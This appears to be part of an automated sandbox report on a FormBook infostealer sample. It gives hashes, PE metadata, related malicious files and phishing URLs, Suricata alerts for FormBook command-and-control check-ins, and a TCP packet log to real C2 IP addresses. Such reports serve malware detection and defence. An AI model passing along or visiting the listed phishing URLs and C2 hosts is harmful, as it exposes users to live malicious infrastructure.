                                                                    TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.64.189
                                                                    z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.79.41
                                                                    ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                    • 209.74.77.107
                                                                    CLOUDFLARENETUS4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.112.1
                                                                    http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 188.114.96.3
                                                                    ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    • 104.21.48.1
                                                                    FUEvp5c8lO.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                    • 104.16.184.241
                                                                    http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                    • 104.17.25.14
                                                                    hZbkP3TJBJ.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 104.21.48.1
                                                                    348426869538810128.jsGet hashmaliciousStrela DownloaderBrowse
                                                                    • 162.159.61.3
                                                                    statement.docGet hashmaliciousKnowBe4Browse
                                                                    • 104.17.245.203
                                                                    http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3DGet hashmaliciousUnknownBrowse
                                                                    • 104.17.245.203
                                                                    https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 172.67.74.152
                                                                    ONEANDONE-ASBrauerstrasse48DEhttps://media.maxfs.de/Get hashmaliciousUnknownBrowse
                                                                    • 212.227.100.139
                                                                    miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 217.174.247.149
                                                                    Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • 77.68.14.124
                                                                    rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                                    • 217.160.0.160
                                                                    https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                    • 74.208.236.22
                                                                    https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                    • 212.227.149.251
                                                                    spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 104.192.6.92
                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    • 213.165.79.98
                                                                    la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                    • 94.143.136.202
                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 217.72.194.9
                                                                    DXTL-HKDXTLTseungKwanOServiceHKfrosty.spc.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.191
                                                                    sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                    • 154.218.87.90
                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                    • 45.194.232.108
                                                                    empsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.142
                                                                    gmips.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.157
                                                                    earm.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.235.189.161
                                                                    sora.ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 156.235.189.130
                                                                    miori.spc.elfGet hashmaliciousUnknownBrowse
                                                                    • 45.197.112.87
                                                                    z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                    • 156.237.184.168
                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                    • 154.214.153.42

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NFhRxwbegd.exe.log

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\NFhRxwbegd.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1216
                                                                    Entropy (8bit):5.34331486778365
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                    Malicious:true
                                                                    Reputation:high, very likely benign file
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                    C:\Users\user\AppData\Local\Temp\086604I_P

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.710414643489114
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:NFhRxwbegd.exe
                                                                    File size:865'280 bytes
                                                                    MD5:7b4d6f3b6a3b509738048774b20fad27
                                                                    SHA1:4e96c226734aa7a5df5910efb87542bfb671674f
                                                                    SHA256:d26c248791d7c1347e8e21257ad5522c1e47e26e054a59bc61a50133e5d180d6
                                                                    SHA512:54e2e71c641c7e831420c8c8514d67fd2c3b2c3d56874f3b08ee5ec49467cf7cbe7d4f516d3e27a3f5d175bd4b366b11bb29adb5f3509e067865dcfbfbb0ed13
                                                                    SSDEEP:12288:RjlIpHtMPku+l0CPPmi7wTVPdP0MAUFcICqX+XSr50t9pMyvE0839:RjlIhSPd+pkTxd5cICqOXSF03u0c
                                                                    TLSH:B705DFC03B2AB711DEACB930857AEDB862541E747004B9E3AEDD3B57B6D91126E1CF10
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...h.Zg..............0......$.......,... ...@....@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:37c38329a3924d33

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4d2cba
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x675A9D68 [Thu Dec 12 08:23:04 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xd2c680x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x21e0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xd80000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000xd0cc00xd0e000e701e1a1d454b99f3a5e50a08b78eaeFalse0.8907594161430281data7.7118543054042075IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xd40000x21e00x2200f9dcf40ced0142a0111d2e552dd031c0False0.9308363970588235data7.6202987927159525IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0xd80000xc0x20086e11b6d885b2c062e977831a8d08cf8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xd40c80x1e1fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9939048113085203
                                                                    RT_GROUP_ICON0xd5ef80x14data1.05
                                                                    RT_VERSION0xd5f1c0x2c0data0.4616477272727273

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-10T21:31:07.184740+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.664216154.12.28.18480TCP
                                                                    2025-01-10T21:31:07.184740+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.664216154.12.28.18480TCP
                                                                    2025-01-10T21:31:23.748355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66421818.139.62.22680TCP
                                                                    2025-01-10T21:31:26.287701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66421918.139.62.22680TCP
                                                                    2025-01-10T21:31:28.841664+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66422018.139.62.22680TCP
                                                                    2025-01-10T21:31:31.402837+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66422118.139.62.22680TCP
                                                                    2025-01-10T21:31:31.402837+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66422118.139.62.22680TCP
                                                                    2025-01-10T21:31:37.436320+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664223104.21.16.180TCP
                                                                    2025-01-10T21:31:39.963653+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664224104.21.16.180TCP
                                                                    2025-01-10T21:31:42.524530+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664226104.21.16.180TCP
                                                                    2025-01-10T21:31:45.060492+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.664227104.21.16.180TCP
                                                                    2025-01-10T21:31:45.060492+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.664227104.21.16.180TCP
                                                                    2025-01-10T21:31:58.975927+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664228209.74.77.10780TCP
                                                                    2025-01-10T21:32:01.521771+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664229209.74.77.10780TCP
                                                                    2025-01-10T21:32:04.084071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664230209.74.77.10780TCP
                                                                    2025-01-10T21:32:06.670746+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.664231209.74.77.10780TCP
                                                                    2025-01-10T21:32:06.670746+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.664231209.74.77.10780TCP
                                                                    2025-01-10T21:32:12.207852+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66423284.32.84.3280TCP
                                                                    2025-01-10T21:32:14.762335+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66423384.32.84.3280TCP
                                                                    2025-01-10T21:32:17.318241+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66423484.32.84.3280TCP
                                                                    2025-01-10T21:32:19.896502+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66423684.32.84.3280TCP
                                                                    2025-01-10T21:32:19.896502+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66423684.32.84.3280TCP
                                                                    2025-01-10T21:32:26.518281+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664237154.208.202.22580TCP
                                                                    2025-01-10T21:32:29.087865+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664238154.208.202.22580TCP
                                                                    2025-01-10T21:32:31.638362+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664239154.208.202.22580TCP
                                                                    2025-01-10T21:32:34.634334+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.664240154.208.202.22580TCP
                                                                    2025-01-10T21:32:34.634334+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.664240154.208.202.22580TCP
                                                                    2025-01-10T21:32:40.316256+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66424177.68.64.4580TCP
                                                                    2025-01-10T21:32:42.836491+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66424277.68.64.4580TCP
                                                                    2025-01-10T21:32:45.772965+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66424377.68.64.4580TCP
                                                                    2025-01-10T21:32:48.369228+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66424477.68.64.4580TCP
                                                                    2025-01-10T21:32:48.369228+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66424477.68.64.4580TCP
                                                                    2025-01-10T21:32:54.169583+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664245208.91.197.2780TCP
                                                                    2025-01-10T21:32:56.697608+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664246208.91.197.2780TCP
                                                                    2025-01-10T21:32:59.272960+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664247208.91.197.2780TCP
                                                                    2025-01-10T21:33:02.365444+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.664248208.91.197.2780TCP
                                                                    2025-01-10T21:33:02.365444+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.664248208.91.197.2780TCP
                                                                    2025-01-10T21:33:08.000458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66424984.32.84.3280TCP
                                                                    2025-01-10T21:33:10.557059+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66425084.32.84.3280TCP
                                                                    2025-01-10T21:33:13.126131+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.66425184.32.84.3280TCP
                                                                    2025-01-10T21:33:15.668369+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.66425284.32.84.3280TCP
                                                                    2025-01-10T21:33:15.668369+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.66425284.32.84.3280TCP
                                                                    2025-01-10T21:33:21.361806+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664253104.21.80.180TCP
                                                                    2025-01-10T21:33:23.895129+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.664254104.21.80.180TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 10, 2025 21:31:00.546556950 CET6421153192.168.2.6162.159.36.2
                                                                    Jan 10, 2025 21:31:00.551379919 CET5364211162.159.36.2192.168.2.6
                                                                    Jan 10, 2025 21:31:00.551475048 CET6421153192.168.2.6162.159.36.2
                                                                    Jan 10, 2025 21:31:00.556643963 CET5364211162.159.36.2192.168.2.6
                                                                    Jan 10, 2025 21:31:00.997481108 CET6421153192.168.2.6162.159.36.2
                                                                    Jan 10, 2025 21:31:01.002362967 CET5364211162.159.36.2192.168.2.6
                                                                    Jan 10, 2025 21:31:01.002437115 CET6421153192.168.2.6162.159.36.2
                                                                    Jan 10, 2025 21:31:05.460952044 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:05.465832949 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:05.465982914 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:05.476617098 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:05.482403994 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.184508085 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.184551001 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.184583902 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.184740067 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:07.184740067 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:07.185071945 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.185148001 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:07.186158895 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:07.186275959 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:07.188102961 CET6421680192.168.2.6154.12.28.184
                                                                    Jan 10, 2025 21:31:07.352679014 CET8064216154.12.28.184192.168.2.6
                                                                    Jan 10, 2025 21:31:22.772789001 CET6421880192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:22.777822971 CET806421818.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:22.777967930 CET6421880192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:22.794205904 CET6421880192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:22.799092054 CET806421818.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:23.748260021 CET806421818.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:23.748301983 CET806421818.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:23.748354912 CET6421880192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:24.303760052 CET6421880192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:25.326303005 CET6421980192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:25.331234932 CET806421918.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:25.334237099 CET6421980192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:25.350195885 CET6421980192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:25.355139017 CET806421918.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:26.287628889 CET806421918.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:26.287647009 CET806421918.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:26.287700891 CET6421980192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:26.866436958 CET6421980192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:27.884886026 CET6422080192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:27.891187906 CET806422018.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:27.891282082 CET6422080192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:27.907691956 CET6422080192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:27.913801908 CET806422018.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:27.913913965 CET806422018.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:28.841588020 CET806422018.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:28.841624022 CET806422018.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:28.841664076 CET6422080192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:29.413439989 CET6422080192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:30.432003975 CET6422180192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:30.437099934 CET806422118.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:30.438193083 CET6422180192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:30.455719948 CET6422180192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:30.460562944 CET806422118.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:31.402487993 CET806422118.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:31.402684927 CET806422118.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:31.402837038 CET6422180192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:31.405808926 CET6422180192.168.2.618.139.62.226
                                                                    Jan 10, 2025 21:31:31.410609007 CET806422118.139.62.226192.168.2.6
                                                                    Jan 10, 2025 21:31:36.776633978 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:36.781481028 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:36.781631947 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:36.798453093 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:36.803324938 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:37.436233997 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:37.436254978 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:37.436320066 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:37.436727047 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:37.436798096 CET8064223104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:37.436847925 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:38.303879976 CET6422380192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:39.323656082 CET6422480192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:39.328717947 CET8064224104.21.16.1192.168.2.6
                                                                    Jan 10, 2025 21:31:39.328809023 CET6422480192.168.2.6104.21.16.1
                                                                    Jan 10, 2025 21:31:39.345108032 CET6422480192.168.2.6104.21.16.1
